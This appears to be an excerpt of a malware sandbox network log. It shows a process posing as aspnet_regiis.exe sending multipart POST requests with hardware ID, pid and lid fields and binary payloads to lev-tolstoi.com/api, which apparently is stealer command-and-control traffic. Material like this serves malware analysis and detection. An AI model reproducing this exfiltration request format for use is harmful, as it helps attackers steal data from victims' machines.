                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC244INData Raw: 31 64 31 61 0d 0a 38 57 71 66 30 75 6a 68 38 65 7a 41 71 38 63 66 43 63 32 33 32 64 2b 4b 43 39 56 51 48 52 64 2b 63 33 2b 59 74 2f 77 53 48 68 65 4b 53 4f 6e 77 30 74 58 64 7a 72 50 4f 35 53 56 76 72 4e 75 71 75 71 59 70 74 44 51 2f 4c 52 67 53 45 2b 76 53 30 44 42 6f 65 74 4e 51 2b 62 4f 45 6b 70 54 41 34 73 36 2f 50 54 4f 57 7a 50 75 36 35 43 6e 76 63 6e 68 39 48 42 49 54 2b 74 61 58 66 57 35 37 6b 67 4c 7a 74 59 43 45 6b 6f 69 68 78 36 70 36 62 4b 6a 57 73 37 48 6a 5a 72 30 39 50 7a 74 63 46 67 57 36 6a 64 35 66 65 32 4f 51 4a 2f 36 68 67 38 4f 4d 77 4c 75 4a 6f 6e 45 72 39 35 57 34 75 75 68 6e 73 7a 52 32 66 78 59 62 47 2f 76 54 6c 6d 4a 33 63 5a 6b 43 2f 62 61 42 6a 70 75 63 72 4d 32 74 63 57 71 69 31 76 76 7a 71 47
                                                                                                                                                                                                                                            Data Ascii: 1d1a8Wqf0ujh8ezAq8cfCc232d+KC9VQHRd+c3+Yt/wSHheKSOnw0tXdzrPO5SVvrNuquqYptDQ/LRgSE+vS0DBoetNQ+bOEkpTA4s6/PTOWzPu65Cnvcnh9HBIT+taXfW57kgLztYCEkoihx6p6bKjWs7HjZr09PztcFgW6jd5fe2OQJ/6hg8OMwLuJonEr95W4uuhnszR2fxYbG/vTlmJ3cZkC/baBjpucrM2tcWqi1vvzqG
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 36 76 63 69 63 31 54 79 4d 65 36 38 53 4c 66 57 78 7a 30 78 65 7a 71 63 71 45 6e 38 37 36 69 61 31 78 5a 61 72 57 74 4c 72 70 61 61 55 39 66 33 59 55 47 52 6e 77 32 70 46 2f 63 6e 2b 55 41 50 53 33 68 59 53 62 69 4b 33 4b 35 54 4d 72 71 4d 33 37 35 61 68 4a 70 7a 46 38 59 52 45 41 58 65 57 62 68 7a 42 37 65 64 4e 51 76 62 61 45 67 70 36 4f 73 4d 47 75 64 6d 36 39 33 72 4b 77 35 57 6d 36 4f 48 42 32 48 42 59 58 38 4e 71 55 64 48 46 34 6c 51 6a 39 38 4d 54 44 6c 4a 62 69 6b 65 56 65 62 72 2f 53 74 36 75 71 55 2f 63 74 4d 57 78 63 46 68 47 36 6a 64 35 34 65 58 61 51 41 2f 4b 7a 67 6f 69 42 6a 72 44 50 71 48 68 35 71 64 43 31 74 2b 74 37 76 54 78 35 64 68 55 61 46 50 2f 53 6d 6a 41 79 4e 5a 51 51 76 65 6a 4b 6f 70 36 46 72 73 4f 79 66 53 75 77 6d 36 4c 39 37
                                                                                                                                                                                                                                            Data Ascii: 6vcic1TyMe68SLfWxz0xezqcqEn876ia1xZarWtLrpaaU9f3YUGRnw2pF/cn+UAPS3hYSbiK3K5TMrqM375ahJpzF8YREAXeWbhzB7edNQvbaEgp6OsMGudm693rKw5Wm6OHB2HBYX8NqUdHF4lQj98MTDlJbikeVebr/St6uqU/ctMWxcFhG6jd54eXaQA/KzgoiBjrDPqHh5qdC1t+t7vTx5dhUaFP/SmjAyNZQQvejKop6FrsOyfSuwm6L97
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 36 64 42 59 62 58 62 53 56 6d 57 67 38 4c 64 4d 35 36 72 76 49 74 70 43 41 72 4d 36 7a 50 58 54 68 7a 50 75 36 35 43 6e 76 63 6e 4a 39 47 52 51 53 2b 39 2b 51 64 58 5a 35 6d 77 62 2b 6f 6f 57 48 6b 34 4b 71 77 36 68 7a 62 36 66 63 73 4c 62 75 61 62 59 34 50 7a 74 63 46 67 57 36 6a 64 35 45 65 33 6d 65 42 37 2b 46 69 59 32 64 69 62 53 4a 75 6a 4e 79 37 39 4b 33 2f 62 41 70 75 7a 74 2f 66 68 59 56 48 66 33 59 6d 33 4e 37 64 70 34 50 39 37 36 4e 68 35 2b 48 72 38 2b 6c 65 6d 2b 71 78 37 36 30 35 47 58 33 66 44 39 79 42 46 46 46 75 76 71 5a 5a 6e 39 61 6b 42 6e 30 38 4a 58 4e 69 73 36 6c 78 65 55 6c 4b 36 6a 51 73 37 62 75 59 62 63 67 65 6e 73 58 45 42 66 38 31 4a 4e 38 65 6e 57 53 43 50 75 38 69 6f 53 55 6e 4c 44 4d 6f 32 39 68 37 35 76 37 75 76 41 70 37 33
                                                                                                                                                                                                                                            Data Ascii: 6dBYbXbSVmWg8LdM56rvItpCArM6zPXThzPu65CnvcnJ9GRQS+9+QdXZ5mwb+ooWHk4Kqw6hzb6fcsLbuabY4PztcFgW6jd5Ee3meB7+FiY2dibSJujNy79K3/bApuzt/fhYVHf3Ym3N7dp4P976Nh5+Hr8+lem+qx7605GX3fD9yBFFFuvqZZn9akBn08JXNis6lxeUlK6jQs7buYbcgensXEBf81JN8enWSCPu8ioSUnLDMo29h75v7uvAp73
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 53 56 33 35 32 70 64 2f 64 48 32 63 42 2f 6d 2b 6a 49 57 65 69 36 33 44 74 33 56 6c 6f 74 36 30 74 76 70 70 75 6a 5a 7a 63 52 51 61 46 37 71 62 33 6e 64 6b 4e 63 74 49 79 4c 32 46 67 35 43 59 34 74 62 72 5a 43 75 6f 32 66 76 6c 71 47 57 35 4d 6e 42 35 45 42 6f 56 2b 39 6d 51 64 33 6c 38 6d 77 44 76 73 59 36 4c 6b 6f 43 74 79 4b 46 34 62 71 76 53 76 37 76 6e 4b 66 6c 79 65 47 31 63 53 56 33 56 38 71 73 79 58 55 2f 54 46 37 4f 70 79 6f 53 66 7a 76 71 4a 71 58 35 6e 70 39 71 39 74 4f 52 6a 76 6a 6c 7a 66 68 67 64 46 50 2f 54 6e 33 56 35 64 4a 63 45 39 37 61 4a 67 4a 79 42 72 63 48 6c 4d 79 75 6f 7a 66 76 6c 71 45 79 67 4f 58 46 7a 58 41 35 54 34 35 57 5a 66 44 77 74 30 77 54 30 74 6f 79 47 6e 34 2b 6b 77 61 42 31 62 36 37 54 76 62 37 6e 62 62 49 7a 63 48 45
                                                                                                                                                                                                                                            Data Ascii: SV352pd/dH2cB/m+jIWei63Dt3Vlot60tvppujZzcRQaF7qb3ndkNctIyL2Fg5CY4tbrZCuo2fvlqGW5MnB5EBoV+9mQd3l8mwDvsY6LkoCtyKF4bqvSv7vnKflyeG1cSV3V8qsyXU/TF7OpyoSfzvqJqX5np9q9tORjvjlzfhgdFP/Tn3V5dJcE97aJgJyBrcHlMyuozfvlqEygOXFzXA5T45WZfDwt0wT0toyGn4+kwaB1b67Tvb7nbbIzcHE
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 63 65 66 66 58 64 6e 6c 41 66 35 74 34 61 46 6e 49 69 6a 7a 4b 39 78 62 4b 72 65 74 4c 47 6f 4a 2f 63 31 5a 7a 56 45 55 54 50 78 78 6f 6c 7a 63 6e 36 46 45 37 32 76 78 4a 72 54 69 61 36 4a 2f 54 31 6f 70 4e 36 2f 76 65 52 70 73 7a 39 2f 5a 78 4d 57 47 76 50 65 6a 48 70 37 63 70 67 41 39 72 2b 4d 6b 5a 2b 41 73 4d 79 33 62 79 76 68 6c 62 79 6c 71 44 48 33 42 48 68 6c 44 42 4a 66 79 38 4f 64 5a 6e 64 34 6e 30 6a 69 2f 70 50 44 6c 49 4c 69 6b 65 56 37 5a 4b 62 57 74 4c 7a 68 5a 62 6f 33 64 6e 41 64 46 78 6e 77 33 35 35 32 65 6e 53 57 41 76 36 78 67 49 71 55 68 71 58 4b 74 7a 30 6c 37 39 4b 6a 2f 62 41 70 6e 6a 56 74 65 77 78 52 41 72 54 4d 33 6e 64 77 4e 63 74 49 2b 62 71 46 68 35 53 43 70 4d 79 6a 63 47 71 67 31 4c 75 79 37 47 4b 2b 4e 48 35 34 47 52 77 5a
                                                                                                                                                                                                                                            Data Ascii: ceffXdnlAf5t4aFnIijzK9xbKretLGoJ/c1ZzVEUTPxxolzcn6FE72vxJrTia6J/T1opN6/veRpsz9/ZxMWGvPejHp7cpgA9r+MkZ+AsMy3byvhlbylqDH3BHhlDBJfy8OdZnd4n0ji/pPDlILikeV7ZKbWtLzhZbo3dnAdFxnw3552enSWAv6xgIqUhqXKtz0l79Kj/bApnjVtewxRArTM3ndwNctI+bqFh5SCpMyjcGqg1Luy7GK+NH54GRwZ
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 77 38 4c 64 4d 49 39 37 57 41 6a 70 43 42 6f 64 75 6b 65 33 6d 76 32 4c 47 76 34 6d 4b 79 50 33 4a 34 48 78 63 62 38 64 6d 4d 65 58 78 32 6d 45 69 7a 38 49 32 62 30 39 62 69 36 72 4a 72 59 61 6a 5a 72 62 62 70 61 71 45 2f 62 7a 56 53 55 51 7a 39 78 4e 34 6f 61 6d 57 45 44 2b 4c 2b 6b 38 4f 55 67 75 4b 52 35 58 74 69 71 64 4b 39 73 2f 70 73 73 54 31 77 66 42 55 56 46 66 6e 56 6d 6e 52 37 63 4a 41 45 39 72 65 4a 6a 4a 65 48 72 4d 43 71 50 53 58 76 30 71 50 39 73 43 6d 57 4b 58 78 35 45 56 45 43 74 4d 7a 65 64 33 41 31 79 30 6a 78 76 6f 2b 44 6d 59 69 6d 7a 4b 4e 33 62 71 2f 65 75 4c 4c 73 62 37 4d 39 66 33 34 56 45 42 76 2f 33 35 56 32 63 58 61 56 44 72 33 2b 79 6f 53 4c 7a 76 71 4a 68 57 5a 6d 6f 39 4c 37 6f 71 5a 77 39 7a 56 7a 4e 55 52 52 46 76 62 52 6d
                                                                                                                                                                                                                                            Data Ascii: w8LdMI97WAjpCBoduke3mv2LGv4mKyP3J4Hxcb8dmMeXx2mEiz8I2b09bi6rJrYajZrbbpaqE/bzVSUQz9xN4oamWED+L+k8OUguKR5XtiqdK9s/pssT1wfBUVFfnVmnR7cJAE9reJjJeHrMCqPSXv0qP9sCmWKXx5EVECtMzed3A1y0jxvo+DmYimzKN3bq/euLLsb7M9f34VEBv/35V2cXaVDr3+yoSLzvqJhWZmo9L7oqZw9zVzNURRFvbRm
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC369INData Raw: 71 53 50 53 33 6b 5a 4b 46 67 37 4c 4f 35 55 49 6c 37 38 33 37 35 61 68 63 74 44 78 78 63 67 6f 41 55 4e 33 44 6c 48 64 73 63 6f 51 48 76 66 37 4b 68 64 50 57 38 59 66 6c 65 58 72 76 6a 65 76 76 73 7a 7a 6b 5a 53 38 6e 41 31 38 45 75 73 50 65 4b 43 34 37 30 78 71 39 36 4d 72 45 6b 4a 79 77 7a 36 5a 72 61 4f 6a 72 68 5a 72 79 5a 4c 45 6c 62 6b 73 69 46 67 66 33 30 34 6c 68 4d 47 43 51 42 76 4f 33 6e 4d 50 64 7a 71 32 4a 2f 55 51 72 35 35 57 45 38 36 68 78 39 32 6f 2f 51 42 38 66 45 2f 33 44 6a 7a 31 62 62 35 34 4f 36 71 48 4b 7a 64 4f 49 34 70 48 31 4d 79 75 72 78 50 76 6c 75 44 76 73 5a 79 77 69 54 45 4d 43 74 4d 7a 65 5a 6a 77 74 77 55 61 39 6f 73 72 62 30 38 6d 68 32 37 64 37 61 4c 6e 57 2f 49 50 57 52 37 41 30 65 6e 49 4d 55 7a 50 78 77 5a 6b 77 4d 6a
                                                                                                                                                                                                                                            Data Ascii: qSPS3kZKFg7LO5UIl78375ahctDxxcgoAUN3DlHdscoQHvf7KhdPW8YfleXrvjevvszzkZS8nA18EusPeKC470xq96MrEkJywz6ZraOjrhZryZLElbksiFgf304lhMGCQBvO3nMPdzq2J/UQr55WE86hx92o/QB8fE/3Djz1bb54O6qHKzdOI4pH1MyurxPvluDvsZywiTEMCtMzeZjwtwUa9osrb08mh27d7aLnW/IPWR7A0enIMUzPxwZkwMj
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 32 35 66 32 0d 0a 77 7a 51 55 73 79 48 42 7a 35 32 39 78 42 61 6e 69 44 43 2f 69 33 74 4c 32 64 69 62 62 4f 71 33 74 72 37 35 76 37 73 71 67 78 6a 6e 49 33 4e 53 4e 66 58 65 4b 56 78 6a 42 4a 64 70 30 47 2b 71 61 62 7a 72 43 59 72 38 61 75 66 43 76 68 6c 62 33 39 73 44 6e 35 63 6e 74 6b 58 45 6c 4e 71 49 37 4c 49 79 73 6c 77 52 65 7a 71 63 71 56 30 39 62 77 68 2b 56 76 4b 2f 65 56 2f 4c 50 6c 61 4c 51 38 66 47 63 4f 46 78 37 73 31 74 6c 4f 51 6c 53 65 41 2f 47 39 68 59 69 74 73 49 50 45 72 6e 46 6d 6f 4e 36 46 67 2f 31 71 75 54 78 34 59 77 31 52 55 37 72 61 33 69 68 46 4e 64 74 49 77 76 37 4b 6d 39 50 57 34 76 79 6d 63 32 57 6f 77 36 72 77 79 57 53 38 50 6e 4a 36 46 31 46 54 75 74 50 65 4b 43 77 37 30 77 7a 73 38 4e 4c 54 77 64 58 33 6d 76 49 74 4f 62 43
                                                                                                                                                                                                                                            Data Ascii: 25f2wzQUsyHBz529xBaniDC/i3tL2dibbOq3tr75v7sqgxjnI3NSNfXeKVxjBJdp0G+qabzrCYr8aufCvhlb39sDn5cntkXElNqI7LIyslwRezqcqV09bwh+VvK/eV/LPlaLQ8fGcOFx7s1tlOQlSeA/G9hYitsIPErnFmoN6Fg/1quTx4Yw1RU7ra3ihFNdtIwv7Km9PW4vymc2Wow6rwyWS8PnJ6F1FTutPeKCw70wzs8NLTwdX3mvItObC
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 6b 2b 58 63 6a 45 31 45 31 46 46 77 35 58 57 4d 45 4d 37 30 78 43 39 36 4d 71 32 6b 49 43 73 7a 72 4e 73 4a 6f 72 43 75 4b 33 75 61 76 64 38 50 33 4e 63 53 55 32 30 6c 5a 70 68 50 43 33 44 57 71 62 6c 32 64 54 44 33 4c 32 48 76 44 31 39 37 34 33 70 38 36 68 37 39 32 6f 2f 4d 68 38 44 44 2f 7a 57 69 48 4d 37 53 36 30 75 2f 71 47 41 6f 70 36 65 70 66 65 62 61 47 69 68 32 37 79 72 2b 53 6e 35 63 6e 41 31 52 43 68 64 73 70 6d 59 63 32 6f 31 72 45 61 39 71 4d 72 62 30 37 75 68 78 36 74 36 66 62 36 59 6e 62 37 35 59 35 59 2f 62 33 4a 63 58 31 33 38 6c 63 59 6a 4d 6a 57 58 47 62 33 6f 32 74 48 49 32 2f 47 65 39 53 39 30 34 63 7a 37 71 36 67 78 35 58 77 2f 5a 31 78 4a 58 62 33 57 6a 47 4a 36 64 6f 55 4c 75 6f 36 30 74 70 43 41 72 4d 36 7a 53 47 69 2b 31 72 75 32
                                                                                                                                                                                                                                            Data Ascii: k+XcjE1E1FFw5XWMEM70xC96Mq2kICszrNsJorCuK3uavd8P3NcSU20lZphPC3DWqbl2dTD3L2HvD19743p86h792o/Mh8DD/zWiHM7S60u/qGAop6epfebaGih27yr+Sn5cnA1RChdspmYc2o1rEa9qMrb07uhx6t6fb6Ynb75Y5Y/b3JcX138lcYjMjWXGb3o2tHI2/Ge9S904cz7q6gx5Xw/Z1xJXb3WjGJ6doULuo60tpCArM6zSGi+1ru2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.449733104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:06 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LEXMHB03TXM1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 18134
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:06 UTC15331OUTData Raw: 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 45 58 4d 48 42 30 33 54 58 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 4c 45 58 4d 48 42 30
                                                                                                                                                                                                                                            Data Ascii: --LEXMHB03TXM1Content-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--LEXMHB03TXM1Content-Disposition: form-data; name="pid"2--LEXMHB03TXM1Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--LEXMHB0
                                                                                                                                                                                                                                            2024-12-27 21:38:06 UTC2803OUTData Raw: 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88
                                                                                                                                                                                                                                            Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                                                                                                                                            2024-12-27 21:38:07 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0cjp8ef9r7lsdq0blec2lt9r9j; expires=Tue, 22 Apr 2025 15:24:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDmc4z%2FuLs7QicyLJuNeICsDJYyFmg5Z7bwRsl%2BXy6ofgDvp5gnUHxGnPyegnxroZlknSLHLO8IyVCpLCNUHS9VAC0lhoKEUxwCGwYuuE%2BO6cM3G62pyqw07OtPllXgZ7I0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74a6d9fef02d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1791&rtt_var=690&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19089&delivery_rate=1565683&cwnd=77&unsent_bytes=0&cid=e0b64d67f41513d2&ts=1002&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.449734104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:08 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6G77YAN4O6JQCPPA9F
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8791
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:08 UTC8791OUTData Raw: 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 47 37 37 59 41 4e 34 4f 36 4a 51 43 50 50 41 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38
                                                                                                                                                                                                                                            Data Ascii: --6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="pid"2--6G77YAN4O6JQCPPA9FContent-Disposition: form-data; name="lid"HpOoIh--aadb8
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:11 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=enhgt8rp2ncnp86jtt8jksi6si; expires=Tue, 22 Apr 2025 15:24:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUEUhzJPRJVvQuoHqRySmDW9KOu2efVGMck%2FbjdTbFJzpxQdv7aTQ3txkBM%2F9sDM0IetocJmTy4hMuB5DvWyjFrDUPZso1TPh9geasaIqPTb%2B8OUdqDKDyVMnbB21A7rneI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74b5c8400f77-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=602&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9729&delivery_rate=1815920&cwnd=231&unsent_bytes=0&cid=d448efdcb7ea0a49&ts=2952&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-27 21:38:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.449735104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:13 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=VTE315RFUWUZY5
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20420
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:13 UTC15331OUTData Raw: 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 54 45 33 31 35 52 46 55 57 55 5a 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 56
                                                                                                                                                                                                                                            Data Ascii: --VTE315RFUWUZY5Content-Disposition: form-data; name="hwid"2917EC6AE9FCD922BEBA0C6A975F1733--VTE315RFUWUZY5Content-Disposition: form-data; name="pid"3--VTE315RFUWUZY5Content-Disposition: form-data; name="lid"HpOoIh--aadb880da83d--V
